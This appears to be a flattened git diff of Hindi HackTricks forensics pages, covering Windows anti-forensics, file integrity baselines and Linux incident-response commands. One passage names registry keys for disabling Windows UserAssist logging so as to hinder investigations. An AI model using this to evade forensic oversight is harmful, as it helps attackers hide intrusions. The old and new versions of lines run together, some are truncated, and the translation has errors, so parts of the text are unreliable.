इसी उपकरण का उपयोग करके टाइमस्टैम्प्स को **किस समय संशोधित किया गया था** की पहचान संभव है: एक ही उपकरण का उपयोग करके समय-चिह्नों को **किस समय संशोधित किया गया था** इसे पहचानना संभव है:
![](<../../.gitbook/assets/image (451).png>) ![](<../../.gitbook/assets/image (451).png>)
@ -56,13 +53,13 @@ HackTricks का समर्थन करने के अन्य तरी
## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना ## `$STANDARD_INFORMATION` और `$FILE_NAME` तुलना
संदेहास्पद संशोधित फ़ाइलों की पहचान के लिए एक और तरीका होगा कि दोनों गुणों पर समय की तुलना की जाए और **मिलान** के लिए देखा जाए **असंगतियाँ** के लिए संदेहास्पद संशोधित फ़ाइलों की पहचान करने के लिए एक और तरीका हो सकता है जो दोनों गुणों पर समय की तुलना करता है और **असंगतियों** की तलाश करता है
## नैनोसेकंड ## नैनोसेकंड
**NTFS** टाइमस्टैम्प्स का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे टाइमस्टैम्प्स वाली फ़ाइलें खोजना बहुत संदेहास्पद है। **NTFS** समय-चिह्नों का एक **प्रेसिजन** है **100 नैनोसेकंड**। फिर, 2010-10-10 10:10:**00.000:0000 जैसे समय-चिह्न वाली फ़ाइलें खोजना बहुत संदेहास्पद है।
## SetMace - एंटी-फोरेंसिक टूल ## SetMace - एंटी-फोरेंसिक उपकरण
यह उपकरण दोनों गुणों `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए एक लाइव ओएस की आवश्यकता है। यह उपकरण दोनों गुणों `$STARNDAR_INFORMATION` और `$FILE_NAME` को संशोधित कर सकता है। हालांकि, Windows Vista से, इस जानकारी को संशोधित करने के लिए एक लाइव ओएस की आवश्यकता है।
@ -78,12 +75,12 @@ NFTS एक क्लस्टर और न्यूनतम जानका
# UsbKill # UsbKill
यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करता है तो **बंद कर देगा**।\ यह एक उपकरण है जो कंप्यूटर को **USB** पोर्ट में किसी भी परिवर्तन को डिटेक्ट करते ही **बंद कर देगा**।\
इसे खोजने का एक तरीका है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच करें** इसे खोजने का एक तरीका यह हो सकता है कि चल रहे प्रक्रियाओं की जांच करें और **प्रत्येक पायथन स्क्रिप्ट की जांच करें**
# लाइव लिनक्स वितरण # लाइव लिनक्स वितरण
ये डिस्ट्रो **रैम मेमोरी के अंदर चलाए जाते हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमति के साथ माउंट किया गया है तो उसे अंतर्दृष्टि करना संभव नहीं होगा। ये डिस्ट्रो **रैम मेमोरी के अंदर चलाई जाती हैं**। इन्हें पहचानने का एकमात्र तरीका है **यदि NTFS फाइल-सिस्टम को लेखन अनुमतियों के साथ माउंट किया गया है**। यदि यह केवल पढ़ने की अनुमतियों के साथ माउंट किया गया है तो उपद्रव का पता लगाना संभव नहीं होगा।
# सुरक्षित मिटाना # सुरक्षित मिटाना
@ -93,10 +90,11 @@ NFTS एक क्लस्टर और न्यूनतम जानका
फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है। फोरेंसिक्स जांच को कठिन बनाने के लिए कई विंडोज लॉगिंग विधियों को अक्षम करना संभव है।
## टाइमस्टैम्प्स को अक्षम करें - UserAssist ## समय-चिह्नों को अक्षम करें - UserAssist
यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाशील द्वारा चलाई गई प्रत्येक क्रियाशील की तारीखें और घंटे बनाए रखती है यह एक रजिस्ट्री कुंजी है जो प्रत्येक क्रियाकलाप को चलाया गया था जब प्रत्येक क्रियाकलाप को चलाया गया था
UserAssist को अक्षम करने के लिए दो कदम हैं: UserAssist को अक्षम करने के लिए दो कदम हैं:
1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT 1. दो रजिस्ट्री कुंजियों को सेट करें, `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackProgs` और `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Start_TrackEnabled`, दोनों को शून्य में सेट करें ताकि हमें संकेत मिले कि हमें UserAssist अक्षम करना है।
2. `H

View file

@ -4,30 +4,28 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* अगर आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * यदि आप चाहते हैं कि **आपकी कंपनी HackTricks में विज्ञापित हो** या **HackTricks को PDF में डाउनलोड करें** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह * [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** पर **फॉलो** करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें** और PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. * **अपने हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details> </details>
# बेसलाइ # मूल्यांक
एक बेसलाइन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि इसे भविष्य की स्थिति के साथ तुलना करने के लिए परिवर्तनों को हाइलाइट किया जा सके एक मूल्यांकन में एक सिस्टम के कुछ हिस्सों का एक स्नैपशॉट लेना शामिल है ताकि **बदलावों को हाइलाइट करने के लिए एक भविष्य की स्थिति के साथ तुलना की जा सके**
उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश की गणना करके और स्टोर करके उसे संशोधित किए गए फ़ाइलें पता लगाने के लिए संचित कर सकते हैं।\ उदाहरण के लिए, आप फाइल सिस्टम की प्रत्येक फ़ाइल का हैश कैलकुलेट और स्टोर कर सकते हैं ताकि आप पता लगा सकें कि कौन सी फ़ाइलें संशोधित की गई थीं।\
यह उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक परिवर्तित नहीं होना चाहिए, या बिल्कुल नहीं इसे उपयोगकर्ता खाते बनाए गए, प्रक्रियाएँ चल रही हैं, सेवाएँ चल रही हैं और किसी भी अन्य चीज़ के साथ भी किया जा सकता है जो बहुत अधिक या पूरी तरह से बदलना नहीं चाहिए
## फ़ाइल अखंडता मॉनिटरिंग ## फ़ाइल अखंडता मॉनिटरिंग
फ़ाइल अखंडता मॉनिटरिंग एक ऐसा शक्तिशाली तकनीक है जो कई प्रकार के जाने और अज्ञात खतरों के खिलाफ IT ढांचे और व्यावसायिक डेटा को सुरक्षित रखने के लिए उपयोग किया जाता है।\ फ़ाइल अखंडता मॉनिटरिंग (FIM) एक महत्वपूर्ण सुरक्षा तकनीक है जो फ़ाइलों में परिवर्तनों का ट्रैक करके IT वातावरण और डेटा की सुरक्षा करती है। इसमें दो मुख्य कदम शामिल हैं:
उद्देश्य एक **बेसलाइन उत्पन्न करना** है जिसमें आप जिन फ़ाइलों को मॉनिटर करना चाहते हैं उन सभी फ़ाइलों का एक **बेसलाइन** बनाना और फिर **नियमित अंतराल** पर उन फ़ाइलों की **संभावित परिवर्तनों** की जांच करना है (सामग्री, गुणवत्ता, मेटाडेटा आदि में).
1\. **बेसलाइन तुलना,** जिसमें एक या एक से अधिक फ़ाइल गुणवत्ताएँ कैप्चर या गणित की जाएंगी और एक बेसलाइन के रूप में स्टोर की जाएंगी जिसे भविष्य में तुलना के लिए तुलना की जा सकती है। यह फ़ाइल के समय और तारीख के रूप में साधारण हो सकता है, हालांकि, क्योंकि यह डेटा आसानी से धोखा दे सकता है, इसके लिए आमतौर पर एक अधिक विश्वसनीय दृष्टिकोण का उपयोग किया जाता है। इसमें नियमित अंतराल पर मॉनिटर की गई फ़ाइल के लिए एक और अद्वितीय चेकसम का मूल्यांकन करना शामिल हो सकता है, (जैसे MD5 या SHA-2 हैशिंग एल्गोरिथ्म का उपयोग करके) और फिर पिछले गणना किए गए चेकसम के साथ परिणाम की तुलना करना। 1. **मूल्यांकन तुलना:** भविष्य की तुलना के लिए फ़ाइल गुणांक या एन्क्रिप्टेड चेकसम्स (जैसे MD5 या SHA-2) का उपयोग करके एक मूल्यांकन स्थापित करें ताकि संशोधनों का पता लगा सकें।
2. **रियल-टाइम चेंज नोटिफिकेशन:** फ़ाइलों तक पहुंचने या संशोधित किए जाने पर तुरंत अलर्ट प्राप्त करें, आम तौर पर OS कर्नल एक्सटेंशन के माध्यम से।
2\. **रियल-टाइम परिवर्तन सूचना,** जो आमतौर पर ऑपरेटिंग सिस्टम के कर्नल के भीतर या एक विस्तार के रूप में कार्यान्वित किया जाता है जो जब एक फ़ाइल तक पहुंचा जाता है या संशोधित किया जाता है तो झंडा दिखाएगा।
## उपकरण ## उपकरण

View file

@ -3,30 +3,30 @@
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **समुदाय के सबसे उन्नत उपकरणों** द्वारा संचालित **कार्यप्रवाह** बनाएं और स्वचालित करें।\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **वर्ल्ड के सबसे उन्नत समुदाय उपकरणों** द्वारा संचालित **ऑटोमेट वर्कफ़्लो** बनाएं।\
आज ही पहुंचें: आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details> <details>
<summary><strong>शून्य से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary><strong>जीरो से हीरो तक AWS हैकिंग सीखें</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary>
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी कंपनी का **विज्ञापन HackTricks में** देखना चाहते हैं या **HackTricks को PDF में डाउनलोड** करना चाहते हैं, तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * यदि आप अपनी कंपनी का **विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके। * **अपने हैकिंग ट्रिक्स साझा करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
## प्रारंभिक जानकारी एकत्र करना ## प्रारंभिक जानकारी एकत्र करना
### मौलिक जानकारी ### मूल जानकारी
सबसे पहले, सुझाव दिया जाता है कि कुछ **USB** के साथ होना चाहिए जिसमें **अच्छे जाने माने बाइनरी और लाइब्रेरी** हों (आप बस उबंटू ले सकते हैं और फोल्डर _/bin_, _/sbin_, _/lib,_ और _/lib64_ कॉपी कर सकते हैं), फिर USB को माउंट करें, और एनवायरनमेंट वेरिएबल्स को उन बाइनरीज का उपयोग करने के लिए संशोधित करें: सबसे पहले, सुझाव दिया जाता है कि कुछ **USB** के साथ होना चाहिए जिसमें **अच्छे जाने माने बाइनरी और लाइब्रेरी** हों (आप बस उबंटू ले सकते हैं और फोल्डर _/bin_, _/sbin_, _/lib,_ और _/lib64_ कॉपी कर सकते हैं), फिर USB को माउंट करें, और env variables को उन बाइनरी का उपयोग करने के लिए संशोधित करें:
```bash ```bash
export PATH=/mnt/usb/bin:/mnt/usb/sbin export PATH=/mnt/usb/bin:/mnt/usb/sbin
export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64
@ -55,19 +55,19 @@ find /directory -type f -mtime -1 -print #Find modified files during the last mi
* **रूट प्रक्रियाएँ** आम तौर पर कम PIDS के साथ चलती हैं, इसलिए अगर आप एक बड़ी PID के साथ एक रूट प्रक्रिया पाते हैं तो आप संदेह कर सकते हैं * **रूट प्रक्रियाएँ** आम तौर पर कम PIDS के साथ चलती हैं, इसलिए अगर आप एक बड़ी PID के साथ एक रूट प्रक्रिया पाते हैं तो आप संदेह कर सकते हैं
* `/etc/passwd` में शैली बिना उपयोगकर्ताओं की **रजिस्टर्ड लॉगिन** की जांच करें * `/etc/passwd` में शैली बिना उपयोगकर्ताओं की **रजिस्टर्ड लॉगिन** की जांच करें
* `/etc/shadow` में **पासवर्ड हैश** की जांच करें जिन उपयोगकर्ताओं के पास एक शैल नहीं है * `/etc/shadow` में **पासवर्ड हैश** की जांच करें जिनके पास एक शैल नहीं है
### मेमोरी डंप ### मेमोरी डंप
चल रहे सिस्टम की मेमोरी प्राप्त करने के लिए, [**LiME**](https://github.com/504ensicsLabs/LiME) का उपयोग करना सुझावित है।\ चल रहे सिस्टम की मेमोरी प्राप्त करने के लिए, [**LiME**](https://github.com/504ensicsLabs/LiME) का उपयोग करना सुझावित है।\
इसे **कंपाइल** करने के लिए, आपको पीडीआई का उपयोग करना होगा जो पीडीआई यंत्र का उपयोग कर रहा है इसे **कंपाइल** करने के लिए, आपको पीडित मशीन द्वारा उपयोग किए जा रहे **वही कर्नेल** उपयोग करना होगा
{% hint style="info" %} {% hint style="info" %}
ध्यान रखें कि आप **LiME या किसी अन्य चीज़ को** पीडीआई यंत्र में स्थापित नहीं कर सकते क्योंकि यह कई परिवर्तन कर देगा ध्यान रखें कि आप **LiME या किसी अन्य चीज** को पीडित मशीन में इंस्टॉल नहीं कर सकते क्योंकि यह कई परिवर्तन कर देगा
{% endhint %} {% endhint %}
तो, यदि आपके पास एक अभिन्न संस्करण का यूबंटू है तो आप `apt-get install lime-forensics-dkms` का उपयोग कर सकते हैं\ तो, यदि आपके पास एक वैशिष्ट्यपूर्ण संस्करण का यूबंटू है तो आप `apt-get install lime-forensics-dkms` का उपयोग कर सकते हैं\
अन्य मामलों में, आपको [**LiME**](https://github.com/504ensicsLabs/LiME) को github से डाउनलोड करना होगा और सही कर्नेल हेडर्स के साथ इसे कंपाइल करना होगा। पीडीआई यंत्र के सटीक कर्नेल हेडर्स प्राप्त करने के लिए, आप बस अपने यंत्र में निर्देशिका `/lib/modules/<कर्नेल संस्करण>` की **नकल** कर सकते हैं, और फिर उन्हें उपयोग करके LiME को **कंपाइल** कर सकते हैं: अन्य मामलों में, आपको [**LiME**](https://github.com/504ensicsLabs/LiME) को github से डाउनलोड करना होगा और सही कर्नेल हेडर्स के साथ इसे कंपाइल करना होगा। पीडित मशीन के सटीक कर्नेल हेडर्स प्राप्त करने के लिए, आप बस अपनी मशीन पर निर्देशिका `/lib/modules/<कर्नेल संस्करण>` की **कॉपी** कर सकते हैं, और फिर उन्हें उपयोग करके LiME को **कंपाइल** कर सकते हैं:
```bash ```bash
make -C /lib/modules/<kernel version>/build M=$PWD make -C /lib/modules/<kernel version>/build M=$PWD
sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime"
@ -84,12 +84,12 @@ LiME का उपयोग **नेटवर्क के माध्यम
#### बंद करना #### बंद करना
सबसे पहले, आपको **सिस्टम को बंद करने** की आवश्यकता होगी। यह हमेशा एक विकल्प नहीं है क्योंकि कुछ समय सिस्टम एक उत्पादन सर्वर होगा जिसे कंपनी को बंद करने की सामर्थ्य नहीं होी।\ सबसे पहले, आपको **सिस्टम को बंद करने** की आवश्यकता होगी। यह हमेशा एक विकल्प नहीं है क्योंकि कुछ समय सिस्टम एक उत्पादन सर्वर हो सकता है जिसे कंपनी को बंद करने की सामर्थ्य नहीं होी।\
सिस्टम को बंद करने के **2 तरीके** हैं, एक **सामान्य बंद करना** और एक **"प्लग निकालना" बंद करना**। पहला वाला **प्रक्रियाएँ सामान्य रूप से समाप्त होने** और **फ़ाइल सिस्टम** को **समकालीन** होने देगा, लेकिन यह भी संभावित **मैलवेयर** को **सबूत नष्ट** करने की अनुमति देगा। "प्लग निकालना" दृष्टिकोण **कुछ जानकारी क हानि** ले सकता है (ज्यादातर जानकारी नष्ट नहीं होने वाली है क्योंकि हमने पहले ही मेमोरी का छवि ले ली है) और **मैलवेयर को कुछ करने का कोई मौका नहीं** होगा। इसलिए, यदि आपको लगता है कि वहाँ कोई **मैलवेयर** हो सकता है, तो सिस्टम पर **`sync`** **कमांड** को निष्पादित करें और प्लग निकालें। सिस्टम को बंद करने के **2 तरीके** हैं, एक **सामान्य बंद करना** और एक **"प्लग निकालना" बंद करना**। पहला वाला **प्रक्रियाएँ सामान्य रूप से समाप्त करने** और **फ़ाइल सिस्टम** को **समकालीन** करने की अनुमति देगा, लेकिन यह भी संभावित **मैलवेयर** को **सबूत नष्ट** करने की अनुमति देगा। "प्लग निकालना" दृष्टिकोण **कुछ जानकारी क हानि** ले सकता है (ज्यादातर जानकारी नष्ट नहीं होने वाली है क्योंकि हमने पहले ही मेमोरी का छवि ले ली है) और **मैलवेयर को कुछ करने का कोई मौका नहीं** होगा। इसलिए, यदि आपको लगता है कि वहाँ कोई **मैलवेयर** हो सकता है, तो सिस्टम पर **`sync`** **कमांड** को निष्पादित करें और प्लग निकालें।
#### डिस्क की छवि लेना #### डिस्क की छवि लेना
यह महत्वपूर्ण है कि **मामले से संबंधित किसी भी चीज़ को अपने कंप्यूटर से कनेक्ट करने से पहले**, आपको यह सुनिश्चित करना होगा कि यह **केवल पढ़ने के लिए माउंट** किया जाएगा ताकि कोई भी जानकारी को संशोधित न करें यह महत्वपूर्ण है कि **मामले से संबंधित कुछ भी अपने कंप्यूटर को कनेक्ट करने से पहले**, आपको यह सुनिश्चित करना होगा कि यह **केवल पढ़ने के लिए माउंट** किया जाएगा ताकि कोई भी जानकारी में कोई परिवर्तन न हो
```bash ```bash
#Create a raw copy of the disk #Create a raw copy of the disk
dd if=<subject device> of=<image file> bs=512 dd if=<subject device> of=<image file> bs=512
@ -156,8 +156,8 @@ ThisisTheMasterSecret
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
[**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करें और **ऑटोमेट वर्कफ़्लो** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित हो।\ [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित **कार्यप्रवाहों** को आसानी से निर्मित करें और स्वचालित करें।\
आज ही पहुंच प्राप्त करें: आज ही पहुंचें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
@ -165,17 +165,14 @@ ThisisTheMasterSecret
### संशोधित सिस्टम फ़ाइलें ### संशोधित सिस्टम फ़ाइलें
कुछ लिनक्स सिस्टमों में बहुत सारे स्थापित घटकों की अखंडता की पुष्टि करने की विशेषता होती है, जो असामान्य या अनुचित फ़ाइलों की पहचान के लिए एक प्रभावी तरीका प्रदान करती है। उदाहरण के लिए, लिनक्स पर `rpm -Va` का उपयोग रेडहैट पैकेज प्रबंधक का उपयोग करके स्थापित सभी पैकेज की पुष्टि करने के लिए डिज़ाइन किया गया है। Linux सिस्टम के घातकता की सुनिश्चिति के लिए उपकरण प्रदान करता है, जो संभावित समस्यात्मक फ़ाइलों को पहचानने में महत्वपूर्ण है।
```bash
#RedHat - **RedHat आधारित सिस्टम**: व्यापक जांच के लिए `rpm -Va` का उपयोग करें।
rpm -Va - **Debian आधारित सिस्टम**: प्रारंभिक सत्यापन के लिए `dpkg --verify` का उपयोग करें, और फिर `debsums | grep -v "OK$"` (जिसके बाद `apt-get install debsums` के साथ `debsums` को स्थापित करें) का उपयोग करें किसी भी समस्याओं की पहचान के लिए।
#Debian
dpkg --verify
debsums | grep -v "OK$" #apt-get install debsums
```
### मैलवेयर/रूटकिट डिटेक्टर्स ### मैलवेयर/रूटकिट डिटेक्टर्स
निम्नलिखित पृष्ठ को पढ़ें ताकि आप मैलवेयर को खोजने के लिए उपयोगी टूल्स के बारे में जान सकें: मैलवेयर खोजने के लिए उपयोगी उपकरणों के बारे में जानने के लिए निम्नलिखित पृष्ठ पढ़ें:
{% content-ref url="malware-analysis.md" %} {% content-ref url="malware-analysis.md" %}
[malware-analysis.md](malware-analysis.md) [malware-analysis.md](malware-analysis.md)
@ -183,46 +180,47 @@ debsums | grep -v "OK$" #apt-get install debsums
## स्थापित कार्यक्रमों की खोज ## स्थापित कार्यक्रमों की खोज
### पैकेज प्रबंधक Debian और RedHat सिस्टमों पर स्थापित कार्यक्रमों की प्रभावी खोज करने के लिए, सामान्य निरीक्षण के साथ सिस्टम लॉग और डेटाबेस का उपयोग करें जो साथ ही साथ मैनुअल जांचों को सामान्य निरीक्षण करें।
डेबियन-आधारित सिस्टमों पर, _**/var/ lib/dpkg/status**_ फ़ाइल में स्थापित पैकेज के विवरण होते हैं और _**/var/log/dpkg.log**_ फ़ाइल में जानकारी रिकॉर्ड होती है जब एक पैकेज स्थापित होता है।\ - Debian के लिए, **_`/var/lib/dpkg/status`_** और **_`/var/log/dpkg.log`_** की जांच करें पैकेज स्थापनाओं के बारे में विवरण प्राप्त करने के लिए, `grep` का उपयोग करें विशिष्ट जानकारी के लिए।
रेडहैट और संबंधित लिनक्स वितरणों पर **`rpm -qa --root=/ mntpath/var/lib/rpm`** कमांड एक सिस्टम पर एक आरपीएम डेटाबेस की सामग्री की सूची देगी।
- RedHat उपयोगकर्ता RPM डेटाबेस को `rpm -qa --root=/mntpath/var/lib/rpm` के साथ क्वेरी कर सकते हैं ताकि स्थापित पैकेजों की सूची बना सकें।
इन पैकेज प्रबंधकों के बाहर मैन्युअल या स्थापित सॉफ़्टवेयर को खोजने के लिए, **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, और **_`/sbin`_** जैसे निर्देशिकाओं का अन्वेषण करें। जानकारी के लिए निर्देशिका सूचियों को सिस्टम-विशेष आदेशों के साथ मिलाकर पहचानें जिन्हें जाने गए पैकेजों से जोड़ा नहीं गया है, सभी स्थापित कार्यक्रमों की खोज को बढ़ावा देने के लिए।
```bash ```bash
#Debian # Debian package and log details
cat /var/lib/dpkg/status | grep -E "Package:|Status:" cat /var/lib/dpkg/status | grep -E "Package:|Status:"
cat /var/log/dpkg.log | grep installed cat /var/log/dpkg.log | grep installed
#RedHat # RedHat RPM database query
rpm -qa --root=/ mntpath/var/lib/rpm rpm -qa --root=/mntpath/var/lib/rpm
``` # Listing directories for manual installations
### अन्य ls /usr/sbin /usr/bin /bin /sbin
# Identifying non-package executables (Debian)
**उपर्युक्त कमांड्स द्वारा सभी स्थापित कार्यक्रमों की सूची नहीं होगी** क्योंकि कुछ एप्लिकेशन कुछ विशिष्ट सिस्टमों के लिए पैकेज के रूप में उपलब्ध नहीं होते हैं और स्रोत से स्थापित करना पड़ता है। इसलिए, _**/usr/local**_ और _**/opt**_ जैसी स्थानों की समीक्षा अन्य एप्लिकेशनों को प्रकट कर सकती है जो स्रोत कोड से संकलित और स्थापित किए गए हों।
```bash
ls /opt /usr/local
```
एक और अच्छा विचार है **$PATH** के अंदर **सामान्य फोल्डर** की **जाँच करना** जो **इंस्टॉल किए गए पैकेज** से **संबंधित नहीं** हैं:
```bash
#Both lines are going to print the executables in /sbin non related to installed packages
#Debian
find /sbin/ -exec dpkg -S {} \; | grep "no path found" find /sbin/ -exec dpkg -S {} \; | grep "no path found"
#RedHat # Identifying non-package executables (RedHat)
find /sbin/ exec rpm -qf {} \; | grep "is not" find /sbin/ exec rpm -qf {} \; | grep "is not"
# Find exacuable files
find / -type f -executable | grep <something>
``` ```
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\ \
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करें और आसानी से **ऑटोमेट वर्कफ़्लो** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित ह।\ [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) का उपयोग करें और आसानी से **ऑटोमेट वर्कफ़्लो** बनाएं जो दुनिया के **सबसे उन्नत** समुदाय उपकरणों द्वारा संचालित हैं।\
आज ही पहुंच प्राप्त करें: आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
## हटाए गए चल रहे बाइनरी को पुनः प्राप्त करें ## हटाए गए चल रहे बाइनरी को बहाल करें
![](<../../.gitbook/assets/image (641).png>)
कल्पना करें एक प्रक्रिया जो /tmp/exec से निष्पादित की गई थी और हटा दी गई थी। इसे निकालना संभव है
```bash
cd /proc/3746/ #PID with the exec file deleted
head -1 maps #Get address of the file. It was 08048000-08049000
dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it
```
## ऑटोस्टार्ट स्थानों की जांच करें ## ऑटोस्टार्ट स्थानों की जांच करें
### निर्धारित कार्याएँ ### निर्धारित कार्यों
```bash ```bash
cat /var/spool/cron/crontabs/* \ cat /var/spool/cron/crontabs/* \
/var/spool/cron/atjobs \ /var/spool/cron/atjobs \
@ -238,63 +236,76 @@ ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Libra
``` ```
### सेवाएं ### सेवाएं
